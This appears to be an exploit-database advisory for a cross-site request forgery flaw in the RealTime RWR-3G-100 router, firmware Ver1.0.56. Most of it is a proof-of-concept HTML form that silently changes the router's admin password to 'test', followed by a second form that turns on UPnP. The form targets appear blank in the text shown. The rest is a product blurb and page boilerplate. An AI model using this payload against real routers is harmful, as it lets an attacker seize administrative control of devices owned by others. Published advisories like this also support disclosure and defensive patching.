RealTime RWR-3G-100 Router Cross-Site Request Forgery

Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

<!-- # Exploit Title: RealTime RWR-3G-100 Router Cross-Site Request Forgery (Change Admin Password) # Date: 13 Aug, 2017 # Vendor Homepage : # Vendor Contact : # Firmware Version : Ver1.0.56 # Exploit Author: Touhid M.Shaikh # Contact: # Website: =================== Product Description =================== Provides Wireless/ Wired Broadband connectivity to SOHO & SME. Provides Broadband connectivity to multiple users on the move.Uses 3G/2.75G USB Dongle to get connected to Broadband/ Optionally Uses Wired Broadband connectivity. Supports HSPA, EVDO, UMTS, HSDPA & HSUPA USB Dongles and Compatible with Blackberry & iPhone. Creates 802.11n Wi-Fi Hotspot for Multiple Users to get connected to Broadband. Small & Sleek Portable Router, Easy to Install & Manage. --> <!-- CHANGE ADMIN PASSWORD to test--> <form action= method=POST name="password"> <input type="text" name="username" value="admin"> <input type="password" name="newpass" value="test"> <input type="password" name="confpass" value="test"> <input type="hidden" value="/status.asp" name="submit-url"> <input type="submit" value="Apply Changes" name="save"> <input type="reset" value=" Reset " name="reset" id="password Reset"> </form> <!-- CHANGE ADMIN PASSWORD Ends here--> <!---Enable The UPNP Service--> <form action= method=POST name="upnpSetup"> <input type="radio" name="upnpfunction" id="upnpfunctiony" value="yes" checked> <input type="radio" name="upnpfunction" id="upnpfunctionn" value="no" > <!-- <input type="radio" name="avupnpfunction" id="avupnpfunctiony" value="yes" checked> <input type="radio" name="avupnpfunction" id="avupnpfunctionn" value="no" > --> <input type="submit" value="Apply Changes" name="save" id="upnp apply" > <input type="reset" value=" Reset " name="reset" id="upnp Reset"> <input type="hidden" value="/upnp.asp" name="submit-url"> </form> <!---Enable The UPNP Service Ends here--> <!-- ======GREEtZ===== my cool Broo and Pratik K.tjani -->

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018,


Back to Top